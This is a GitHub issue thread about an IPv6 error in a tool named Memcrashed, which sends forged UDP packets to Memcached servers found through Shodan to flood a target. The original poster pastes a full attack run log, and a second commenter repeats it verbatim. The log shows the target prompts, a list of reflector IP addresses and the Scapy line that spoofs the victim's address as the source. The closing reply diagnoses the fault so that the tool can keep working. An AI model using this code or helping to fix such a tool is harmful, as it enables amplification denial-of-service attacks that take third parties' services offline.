649 / Memcrashed-DDoS-Exploit

DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API
1.34k stars 467 forks source link

IPv6 Error #40

Closed mrjbom closed 5 years ago

mrjbom commented 6 years ago

*] Use Shodan API to search for affected Memcached servers? <Y/n>: y
[~] Checking Shodan.io API Key: key [✓] API Key Authentication: SUCCESS [~] Number of bots: 32961

[] Save results for later usage? <Y/n>: y [~] File written: ./bots.txt [] Would you like to use locally stored Shodan data? <Y/n>: y
[▸] Enter target IP address: IP. [▸] Enter target port number (Default 80): 80 [▸] Enter preferred power (Default 1): 1
[+] Enter payload contained inside packet:
[] Would you like to display all the bots from Shodan? <Y/n>: n [] Would you like to display all the bots stored locally? <Y/n>: n [*] Ready to engage target IP? <Y/n>: y [+] Sending 1 forged UDP packet to: 103.21.148.134 .[+] Sending 1 forged UDP packet to: 23.225.239.38 .[+] Sending 1 forged UDP packet to: 209.141.39.89 .[+] Sending 1 forged UDP packet to: 119.29.254.55 .[+] Sending 1 forged UDP packet to: 118.244.234.81.[+] Sending 1 forged UDP packet to: 193.109.144..........

Error +] Sending 1 forged UDP packet to: 199.66.200.177.[+] Sending 1 forged UDP packet to: 116.228.231.107 .[+] Sending 1 forged UDP packet to: 2a02:c200:1:10:2:6:4103:1 Traceback (most recent call last): File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 238, in h2i inet_aton(x) OSError: illegal IP address string passed to inet_aton
During handling of the above exception, another exception occurred: Traceback (most recent call last): File "Memcrashed.py", line 135, in send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 240, in call i.init(*args, **kargs) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/packet.py", line 134, in init self.fields[f] = self.get_field(f).any2i(self, v) es/scapy/packet.py", line 134, in init self.fields[f] = self.get_field(f).any2i(self, v) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 259, in any2i return self.h2i(pkt,x) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 240, in h2i x = Net(x) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 90, in init self.parsed,self.netmask = self._parse_net(net) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 83, in _parse_net tmp[0]=socket.gethostbyname(tmp[0]) socket.gaierror: [Errno -9] Address family for hostname not supported

Please help.

CrimsonTorso commented 5 years ago

*] Use Shodan API to search for affected Memcached servers? <Y/n>: y [~] Checking Shodan.io API Key: key [✓] API Key Authentication: SUCCESS [~] Number of bots: 32961

[] Save results for later usage? <Y/n>: y [~] File written: ./bots.txt [] Would you like to use locally stored Shodan data? <Y/n>: y [▸] Enter target IP address: IP. [▸] Enter target port number (Default 80): 80 [▸] Enter preferred power (Default 1): 1 [+] Enter payload contained inside packet: [] Would you like to display all the bots from Shodan? <Y/n>: n [] Would you like to display all the bots stored locally? <Y/n>: n [*] Ready to engage target IP? <Y/n>: y [+] Sending 1 forged UDP packet to: 103.21.148.134 .[+] Sending 1 forged UDP packet to: 23.225.239.38 .[+] Sending 1 forged UDP packet to: 209.141.39.89 .[+] Sending 1 forged UDP packet to: 119.29.254.55 .[+] Sending 1 forged UDP packet to: 118.244.234.81.[+] Sending 1 forged UDP packet to: 193.109.144..........

Error +] Sending 1 forged UDP packet to: 199.66.200.177.[+] Sending 1 forged UDP packet to: 116.228.231.107 .[+] Sending 1 forged UDP packet to: 2a02:c200:1:10:2:6:4103:1 Traceback (most recent call last): File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 238, in h2i inet_aton(x) OSError: illegal IP address string passed to inet_aton During handling of the above exception, another exception occurred: Traceback (most recent call last): File "Memcrashed.py", line 135, in send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 240, in call i.init(*args, kargs) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/packet.py", line 134, in init self.fields[f] = self.get_field(f).any2i(self, v) es/scapy/packet.py", line 134, in init self.fields[f] = self.get_field(f).any2i(self, v) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 259, in any2i return self.h2i(pkt,x) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 240, in h2i x = Net(x) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 90, in init** self.parsed,self.netmask = self._parse_net(net) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 83, in _parse_net tmp[0]=socket.gethostbyname(tmp[0]) socket.gaierror: [Errno -9] Address family for hostname not supported

Please help.

It's because the Memcrashed.py encountered a IPv6 IP address. It's only been programmed to interact with IPv4 IPs and read them.